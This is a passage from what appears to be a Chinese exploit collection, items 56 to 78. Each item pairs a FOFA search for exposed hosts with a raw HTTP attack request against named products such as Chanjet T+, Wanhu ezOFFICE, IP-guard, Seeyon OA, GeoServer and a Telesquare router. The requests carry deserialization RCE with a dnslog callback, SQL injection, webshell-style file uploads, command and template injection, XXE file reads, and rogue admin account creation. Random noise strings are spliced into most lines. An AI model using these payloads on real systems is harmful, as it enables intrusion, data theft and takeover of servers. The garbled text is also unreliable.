56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE5 c# s! V, z# z, }5 {, z& \
FOFA: app="畅捷通-TPlus"
$ Q: R3 m& S7 I$ `/ OPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
) B, ?0 t0 V3 k8 p7 K+ ZHost: x.x.x.x/ W; \( z) N8 p* d. M) S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
, S5 ]- O8 T& O5 z0 R4 L! tContent-Type: application/json
! S# B" G) N% a0 U Y0 h2 I3 ^6 J; t% }8 e
{1 k; x* @$ c# m! i
"storeID":{
2 a$ a. {& [1 Z4 `: N% ^6 t "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
. x1 U' ~; n% E2 R "MethodName":"Start",* l; B+ j- p7 ~# G* ]0 Z
"ObjectInstance":{& } j, N' O |! h+ z
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",7 s4 w! D) z. J
"StartInfo": {
3 c& r! q b! Z1 _, a/ y* Q "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
- p9 O' b0 J! z8 [9 p "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
% J) k. K8 g3 a& |, u) R }
- R8 o9 b- r( T w, e; A }
! v+ x# u. X5 k }7 v+ {+ O: @& M X- @0 U% f4 R
}9 B/ i! J/ y& M6 U' O+ u
% j. |4 s" U4 e0 [- H; o
" W- b o. u5 w/ P$ z57. 畅捷通T+ keyEdit.aspx SQL注入
- g+ ]. a7 U% v& J0 p, h5 X( JFOFA:app="畅捷通-TPlus" \! j2 D. W1 N6 F% W9 b
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
" o- ?; R- a0 R; i( |# ?Host: host7 \1 ? b: Y+ D/ v
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
4 k2 L7 O: c$ O9 `3 o4 \Accept-Charset: utf-8
. `0 f' G6 i( | N4 r' u9 p0 x! MAccept-Encoding: gzip, deflate. E+ K9 F n3 [7 j: j/ Q Z- W; O
Connection: close
' e( w; k# D4 r. Y \
! i3 M K# ~! s; }9 ~8 F8 `- R. C w U; h2 E( t6 ~6 I
58. 畅捷通T+ KeyInfoList.aspx sql注入& j+ y# d- Y j( K
FOFA:app="畅捷通-TPlus"& T7 Y) b: M# @1 Z
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1% z" f, l2 y3 p9 } Y( H1 W' e" |0 h
Host: your-ip9 n5 k1 s7 r% ^7 f# P/ ?
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
' J" _1 U. b4 _ S# O1 _Accept-Charset: utf-8- c. T4 P- O1 F) t0 g+ z# V) B
Accept-Encoding: gzip, deflate
; F& Z9 U# I* J* aConnection: close
& I+ ^' g' l% g$ z( [; _1 R$ C. |/ m/ i* o! j9 i# V3 C
! E% b- {1 t2 D/ N59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行& e( T, j2 B7 Z. k% b
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"$ s( O3 m$ |2 }5 T6 _ o' R; V
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1- x6 p5 v5 j! f% c% y# f0 R
Host: 192.168.86.128:90902 O7 Q$ c8 k, n ^& V5 w$ N+ O
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.362 s. d3 t+ o8 b, g5 ^
Connection: close
- X* G7 F8 n! q; k9 bContent-Length: 1669
. F0 ^. l1 g) GAccept: */*
: H( d- k, J6 z2 v0 VAccept-Language: en- s. _% b& Q" E0 O
Content-Type: application/x-www-form-urlencoded" Q# x; ?1 A0 U' B
Accept-Encoding: gzip
4 d( b/ }# }) q( O
' G4 e4 \( |% ?/ u3 _! ~. C6 |PAYLOAD, `; B" g( ~: m; i: ^
6 T1 y- y$ R1 Y
! b9 T# ]9 ^! f60. 百卓Smart管理平台 importexport.php SQL注入
$ E+ Q2 B0 `% l) Q& r# e) l ^FOFA:title="Smart管理平台": q. H- O: v$ Y& k
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
% X# d% C# ?- j r$ jHost:9 D% b* O# s7 y! ~: j7 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; E) X8 Y2 h: O1 G- F. h$ ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 V/ \8 q7 A! d5 o$ _ y: h
Accept-Encoding: gzip, deflate
! F/ n# j6 n; A- aAccept-Language: zh-CN,zh;q=0.9
- z5 V6 h% X2 M* J8 B& O- Q; IConnection: close
3 w. i& u; t1 P9 Y1 v. u3 L) E- f; B% v2 ~5 X* E Y" B& W" e0 N
4 i# q7 @( g# h61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
% l, \ r' v/ A8 ?6 iFOFA: title="欢迎使用浙大恩特客户资源管理系统"7 j" J# B! F; E& q
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
' s1 M+ j+ x9 ^# }: I4 GHost: x.x.x.x
' |: p# O% ?7 ~+ IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ d, O3 R, t& ~* oConnection: close$ [$ ^4 S5 v8 h
Content-Length: 27, \1 Y/ T! S3 K, g4 o! F" z
Accept: */*1 X/ p" S/ K0 c( k/ y! {& Z K
Accept-Encoding: gzip, deflate
3 e+ S+ X/ J" K. q rAccept-Language: en; v: r1 O/ c i; F$ k. M
Content-Type: application/x-www-form-urlencoded
8 X+ {1 B1 w# L4 j* w4 Y2 `9 S9 Z) r4 ]8 v( B. f
8uxssX66eqrqtKObcVa0kid98xa
4 {' u* {/ }$ Q3 |/ n: X2 ?2 B6 x% W
, K* j) _+ I0 ?* c, k1 y q! r- y
62. IP-guard WebServer 远程命令执行
6 a/ e6 B- o+ ^FOFA:"IP-guard" && icon_hash="2030860561"8 P8 W# k, z& r, f- H
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
) {* h) e r7 m1 F X5 }# SHost: x.x.x.x
/ \5 r* D% f6 Q! Z7 A+ `% dUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36" |, k% {; m( w9 y3 t4 @2 D
Connection: close1 c4 u3 D4 Z6 h5 M) b
Accept: */*
! r1 z4 G1 h5 X) `& d% v" j. H2 EAccept-Language: en
' m4 Q% E" b* ]: v5 }3 |; h4 s: HAccept-Encoding: gzip
& E6 g, R8 G5 P1 u
! F' C2 l7 H9 s8 Z8 L; A0 r
2 U3 J# Z0 ~9 L) t" N3 o访问" D9 L1 ~+ U; o P) \% @
( m7 b8 [, B& W8 E3 L! F# B1 mGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
/ a2 ^; z. t# o6 D: mHost: x.x.x.x
" L4 m% s% L0 M2 L' L- \6 ^# u2 z; x
* Y! B9 B: ], A7 ^( ?63. IP-guard WebServer任意文件读取
) E! `5 e% U5 p/ y. e( t2 o4 UIP-guard < 4.82.0609.0
: l5 S; L" l( b* dFOFA:icon_hash="2030860561"
0 ^1 _/ r$ K8 R RPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
0 }# x' J y6 jHost: your-ip( D. u: n4 z9 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
! ~+ Z; a6 T5 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% h' ~' d8 g4 m; k4 \& I
Accept-Encoding: gzip, deflate$ ] Y" [! P; E) @0 h3 L. R8 h
Accept-Language: zh-CN,zh;q=0.9, V3 Y, N1 R0 z7 {) ^( x
Connection: close3 V, p H d! B) N
Content-Type: application/x-www-form-urlencoded
' Y" r- |* B" g
" L, L3 w6 w. r9 @. p2 Zpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A% c+ g/ T4 n& J, h+ V
7 O1 v5 T0 e: m2 ], r8 |- V$ B$ s4 \* v
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
2 J/ u8 P! m1 e3 n- B( I4 u& d* jFOFA:body="/Scripts/EnjoyMsg.js"
8 v+ J7 ^+ Q5 _& A* g! P! a6 S' F: EPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
' E; u0 { d9 ?( ^4 r% a+ G& B0 \/ }Host: 192.168.86.128:9001
) Z% u( p" [4 v8 B. v# FUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.361 k' r5 C t! s' [2 f. t. W- m
Connection: close
! `2 i) S( D+ Z1 n4 C$ v3 LContent-Length: 369' z' ~$ Z8 }/ m0 }& ?
Accept: */*
\7 L( m3 k2 GAccept-Language: en
8 f3 d( |0 f) ]9 X. _2 j! VContent-Type: text/xml; charset=utf-8' a2 h% G/ P6 C7 _& `( m7 }
Accept-Encoding: gzip8 d7 [1 s& u, S& F4 r; z
. x9 y3 Y: o6 o- \9 Y2 r
<?xml version="1.0" encoding="utf-8"?>
& C5 @0 O6 U% o, [" O+ s/ Q+ g8 p% w<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">5 C" `- l3 l+ u% p
<soap:Body>
1 I( `7 h+ _ N <GetOSpById xmlns="http://tempuri.org/">1 N- d/ R$ B3 o2 ?: e2 g
<sId>1';waitfor delay '0:0:5'--+</sId>; L: T) V2 L% F0 k" V
</GetOSpById>3 D' Q, H' G$ w' I8 r8 R3 l$ P
</soap:Body>
9 _# H" Y3 K2 y7 a% \</soap:Envelope>/ m/ j/ E/ E- N
" v4 E* F9 d, e3 e" p& X
+ a& e" ^, p& W65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
+ ^# f7 p) p0 L; l$ {1 oFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"2 }8 S" c9 s0 G
响应200即成功创建账号test123456/123456# z3 E( I" \2 X" F9 }( l
POST /SystemMng.ashx HTTP/1.1
4 }& G( i6 w! ?Host:
$ T- B* ?5 m' ~' h( y9 D- [User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)) c: z8 W" z# Z. \4 e
Accept-Encoding: gzip, deflate" V; g' z% q z
Accept: */*
4 _! S# e! W6 t& e1 d0 LConnection: close
7 @' q4 B& ^9 v( e8 W0 u$ q% YAccept-Language: en
' ^) {/ G# `7 \Content-Length: 174; u- n+ ]% N" Y, I$ d
( X' G/ ?6 v- R+ p" v1 p
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
5 T2 P; l$ v3 ]& f' I- P3 e4 {( m. P. Q3 K( |* g; I
6 z! n0 f1 k; c* S1 X2 u. T
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入: Y( Z; [( c2 \+ z, Q
FOFA:app="万户ezOFFICE协同管理平台"; N# Y0 r5 U. A7 P# F. t# [
) j* C8 m0 V. P) k
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
) _1 i7 i P7 _( m8 m# IHost: x.x.x.x9 t6 ]6 \" B4 F& _8 ^/ a4 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 E V R# }' b n- t W7 R2 jConnection: close
, o, h$ Q) ] M7 Y6 j% {Accept: */*
- I/ U8 D! G3 y) n) cAccept-Language: en
0 v9 l& a x2 x; e9 qAccept-Encoding: gzip
8 B+ I* U/ S" s! a0 Z* F1 y
* g9 d' A0 F9 g9 c1 ?5 j+ J
; B8 b- w D. t# q1 Z第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
, ^8 C1 K9 a; J7 V1 W+ O4 ~+ e( o1 }. c0 d& l" O) B
67. 万户ezOFFICE wpsservlet任意文件上传
0 n% N8 j% B5 u3 \) |6 w) G% DFOFA:app="万户网络-ezOFFICE"6 b. V( y2 V3 v+ b: a
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型( s5 C5 H$ v0 }! s8 Q! ] ~
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
- I+ J% ]6 Y& R6 Z: v4 ^Host: x.x.x.x4 i0 O0 x# v; s
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
) {$ {# O; K& MContent-Length: 173
0 t+ J L" M3 e1 n/ n, z, M& jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8* i- B. A. M$ U2 z; p$ I
Accept-Encoding: gzip, deflate
% C" w( }! H6 _% g' I5 p) OAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
( m4 W$ {1 h1 FConnection: close$ K6 }3 \) m' z9 F" \3 {! \7 n
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
. A( A# c& \* T5 }: rDNT: 1$ q8 d; g- m9 O$ z1 R& G
Upgrade-Insecure-Requests: 1
6 v4 A2 T0 ] N3 g7 F. e" t4 N# h( k
2 L2 m8 t3 j! |2 j: c+ p8 s--ufuadpxathqvxfqnuyuqaozvseiueerp$ A; I- m9 a. |+ ?8 X
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"& a6 d: }: s! S6 X7 P* [. o/ F
- F* y8 N# c c
<% out.print("sasdfghjkj");%>
6 l2 a! X0 |) K A- L--ufuadpxathqvxfqnuyuqaozvseiueerp--" f: l$ c0 O/ o0 s
) u" e* s* u; J$ ?- G
6 k/ P+ j) g7 k# ?) Y2 E文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp, `1 D1 l" A7 Z1 [" U# D. l3 n; Z. m2 f
- S( f9 m9 U1 L. I$ K68. 万户ezOFFICE wf_printnum.jsp SQL注入0 Y; N+ V" N0 V- ?3 F
FOFA:app="万户ezOFFICE协同管理平台"
, ?6 I$ D) _- Y$ z o- |GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
4 b6 G/ t q/ U, c4 M4 @Host: {{host}}
7 K6 Q9 K7 H) b; |/ u0 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36! l! {1 m) ~; h8 K" @: X, _1 @
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.86 R J4 _4 k* I: C! l' x
Accept-Encoding: gzip, deflate
6 U4 O" l+ \8 c% LAccept-Language: zh-CN,zh;q=0.96 e. k+ X2 ?* M( P f
Connection: close v$ j, M( ~* c% F3 J/ V* w
) @( P! M e, O8 B# V0 g2 G9 ]2 p: g
69. 万户 ezOFFICE contract_gd.jsp SQL注入3 ?, E% I5 x7 c$ }- t
FOFA:app="万户ezOFFICE协同管理平台"% w+ y8 x" v: E+ B: ]3 S
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.12 v' v. G+ q: o6 C
Host: your-ip
- M6 P* j7 P( VUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.369 N' p8 Z: ^! N: p$ k9 s" R
Accept-Encoding: gzip, deflate8 S7 P( T1 K9 a/ e" k. ?! Q
Accept: */*
' }% r+ U8 @0 p$ U* T, FConnection: keep-alive
1 |4 j/ A2 o! n | n2 d' M9 m+ P/ B. |# Q) T
- d' `" `+ U* r, ~3 F70. 万户ezEIP success 命令执行
: r1 e: E3 H+ C8 R; x( M$ U, t0 ?. EFOFA:app="万户网络-ezEIP"
3 x) i' h1 M. g3 {0 K- V0 {POST /member/success.aspx HTTP/1.1
% O* B& R; C/ \7 x; j! aHost: {{Hostname}}7 _1 n7 g# D- l) h7 V6 x1 ?7 f7 J- a5 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
3 t4 [- r: g3 ?0 n5 h$ r6 {# xSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
$ T# b$ A4 B7 K/ n' B3 ]Content-Type: application/x-www-form-urlencoded
' [, e/ ]2 O7 K3 |' l% Z4 [TYPE: C
7 l- h4 P ]2 a+ QContent-Length: 16702
3 I1 `% p3 X+ {9 X5 V$ y5 N; U- s3 j- B. K1 u& ?8 ? t, w
__VIEWSTATE=PAYLOAD, y7 B' p/ j. q7 o5 I
( v# h9 Y9 W( s, [, e$ A- Y4 f' ?) V* C' p- |# }$ f, l6 K& x
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入7 D4 @5 ?+ O* N" j
FOFA:body="PM2项目管理系统BS版增强工具.zip"
/ p- Y# |" ?$ J# hGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
9 r, S3 C' S1 G$ A4 IHost: x.x.x.xx.x.x.x3 X j3 Y# m% X& T4 f) W
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
# i A' N; W0 m( {4 yConnection: close
9 k- `8 c% r+ o1 k4 x/ T3 `6 l2 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 r4 ?1 [: f5 F. w" cAccept-Encoding: gzip, deflate
! q: g. P3 j. \ KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: z7 W* z6 t3 j | y8 _# c! A7 X
Upgrade-Insecure-Requests: 1
& i( r. Z+ L X7 Z& x3 Q/ S9 x/ O1 L8 b0 J$ ]
- X# o6 @$ G) z5 R72. 致远OA getAjaxDataServlet XXE
, r$ j" w9 \+ J; D+ wFOFA:app="致远互联-OA"2 c, S' D: k- U( D- ^3 U
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
, T2 p7 a5 |/ uHost: 192.168.40.131:8099
! r* N: x4 p: H* {" O oUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36& q5 `$ |' L7 X6 y$ O* W
Connection: close
5 y& K2 H5 s% @Content-Length: 583. S6 e8 Z2 `7 d: W3 [
Content-Type: application/x-www-form-urlencoded
8 P' W0 K+ ^. o% y6 A3 PAccept-Encoding: gzip! I9 g5 P0 g j
: O' x4 w2 g+ ]
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
6 R+ t3 G' ]; ]( a- I* h3 |# C: B' a8 r6 T6 P$ U
2 v4 p3 U6 d- v' h: F
73. GeoServer wms远程代码执行
# S+ Y. |& b/ e; {2 i: m0 mFOFA:icon_hash=”97540678”+ r' F& L8 u4 S
POST /geoserver/wms HTTP/1.1 I9 p( |* O ]! G2 Z) m
Host:
( g$ ]7 A( Q* Z; J0 ^7 h4 cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.362 t3 @4 [! U- O/ v9 P
Content-Length: 1981
: b! ], u& ?6 z$ CAccept-Encoding: gzip, deflate# U# H9 q w5 G+ z( I
Connection: close
- a/ f# _0 t+ l7 jContent-Type: application/xml( u2 N& j' E$ O: b5 D# J1 n% x
SL-CE-SUID: 3
7 S; ]- F# d5 y, h6 D' q4 {: Y$ o. }1 d
: {( L6 \" |8 R& `0 t3 y" [8 fPAYLOAD
4 e' G6 K# e. I: T7 H
0 d2 f8 g! T+ R0 T8 O' \( U
1 ]- @) r* c. j+ ?" X7 C74. 致远M3-server 6_1sp1 反序列化RCE
" D. K! n! c6 b' D$ t& S( CFOFA:title="M3-Server"0 J B9 ~8 O$ }/ ]& a
PAYLOAD
' r1 n0 t- y- n' q
% e8 a5 G/ ]- R& z75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE: h0 E- O+ |3 ~0 e2 t5 c8 H/ p
FOFA:app="TELESQUARE-TLR-2005KSH"* ?! D8 A. c- J" \/ I( o
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.19 F/ x( \: U! D3 p3 T# P' Q
Host: x.x.x.x+ N# Y5 g' }& Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 a+ B6 e1 S2 a% h+ ZConnection: close7 G8 o$ u1 R: _- D9 ?
Accept: */*
/ t% H+ q4 L, V8 sAccept-Language: en( R4 [' B; R2 B; g! H
Accept-Encoding: gzip
1 W( l( V7 \% q7 P& g5 s" Z9 J6 v0 I, |- s) q
0 |0 O* E) K+ `
GET /cgi-bin/test28256.txt HTTP/1.1
9 g0 U* p& r: l5 t! S( GHost: x.x.x.x$ f* \% {( Z9 J Z: g
: @, \- p1 x/ ~% u1 d1 J+ L
; h8 N9 n. X* A1 E
76. 新开普掌上校园服务管理平台service.action远程命令执行
0 ^0 P5 _6 T( }FOFA:title="掌上校园服务管理平台"
% S6 s( l) l8 U* a1 [# ^; xPOST /service_transport/service.action HTTP/1.16 i; C# _! E" G" K' T% ^' u
Host: x.x.x.x
T% }8 B% ]8 j7 z+ U3 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
$ D- D1 E" l% D) d' v3 H: uConnection: close
. i3 a5 q( L$ O! e* s6 ^Content-Length: 211
' s3 o7 B4 H3 R$ ^9 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 I3 z V) |# U! l9 `
Accept-Encoding: gzip, deflate
$ J. |8 |! d" L9 p; pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ w3 _$ p- Q+ N, |+ O( R nCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
; T0 B: { G, u+ WUpgrade-Insecure-Requests: 1* @+ {5 |4 T8 z- p! ?
0 @# w, |. j+ m. r' n! a, C{/ O7 Y) I$ y( C- r* p' r. V' [
"command": "GetFZinfo",
) n3 b' M( e$ Z1 R& |6 E3 d. H "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"8 {- J3 q; m) Z( J0 _
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
$ l3 m# U- n2 k1 |* J1 n0 S- d}3 h1 S$ b" Q$ Q) Y% m: g, \
- P: z! A2 G9 P
/ ]9 O( M! g8 aGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1* ^$ T4 `/ X8 q0 k1 R0 k
Host: x.x.x.x
1 ]" e8 D- G7 B* C( a2 [1 D5 z' e. o( p
1 E! i6 s2 b, S
* ^9 _! A& U# S; C# x y! C8 {! j+ R# P3 F) M
77. F22服装管理软件系统UploadHandler.ashx任意文件上传 W5 I! J- w2 A9 p8 P4 D9 ]! J9 R
FOFA:body="F22WEB登陆"! j/ V. U9 _5 o& {( V. ?
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
% d, Y- t- \+ y3 iHost: x.x.x.x" n2 y* \! ?2 U/ A5 o% }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 ^' W; @6 F. c& y# BConnection: close
- S _3 |3 a) `* K- @. K! ?" CContent-Length: 4330 e3 R9 F+ y3 X% i& C' {
Accept: */*' S! G: t( G. n$ g6 u+ l
Accept-Encoding: gzip, deflate
% C# ? I! j/ U# }2 ?Accept-Language: zh-CN,zh;q=0.9
~7 j7 {- J6 I8 x% Y9 {Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix% z. X4 z' r5 C8 X0 c
) y- Y3 c, V9 D! X2 l$ L, F5 X
------------398jnjVTTlDVXHlE7yYnfwBoix
3 |$ g& { d+ O5 |, |Content-Disposition: form-data; name="folder"
5 i7 a0 [ Y. L3 A, i" m3 m9 I H( m. d+ x2 X! b' J6 `
/upload/udplog/ |( Z# Z5 V. s5 a4 m
------------398jnjVTTlDVXHlE7yYnfwBoix8 s3 a. f' H1 @" _/ d, h' N
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
2 _9 I' I0 M. r$ v" h4 m PContent-Type: application/octet-stream6 e% ^5 S+ I5 {6 m7 b
" ?8 o; H. r- G; _ vhello1234567
( Y$ V k! z1 i9 e5 X7 {; f------------398jnjVTTlDVXHlE7yYnfwBoix
C, v* P, _: t0 iContent-Disposition: form-data; name="Upload"
3 r/ M6 N$ }! A& j0 {$ i- w* @$ M6 n2 }1 C+ M$ D* D
Submit Query8 Y) W1 ^- K1 i, c6 C: V
------------398jnjVTTlDVXHlE7yYnfwBoix--0 U+ U0 n0 o8 r& F
, z3 H* r9 k6 _) j8 \) A
' O( c. [3 ], b p: |! G2 l
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
6 P0 U- |6 y1 J$ u- y# Y2 QFOFA:icon_hash="2001627082"
/ o+ a+ C+ u" XPOST /Platform/System/FileUpload.ashx HTTP/1.18 A8 l/ w4 _3 b' h& _6 ?3 F$ F7 u! l
Host: x.x.x.x
( C' b: H2 n' ~7 n& iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( z0 Q" V& r* BConnection: close! {; `. J$ n* m8 F5 b+ L
Content-Length: 336
8 Q# y3 c, o& b+ e! _6 J7 z. S; yAccept-Encoding: gzip
6 f( p! M7 D5 _" d) L; {Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l/ W$ p5 B; I) I% Z3 c7 _
" N+ h6 ?9 a, m
------YsOxWxSvj1KyZow1PTsh98fdu6l9 [& w& F1 G- {% l' Q& K4 H7 j/ Z7 p
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
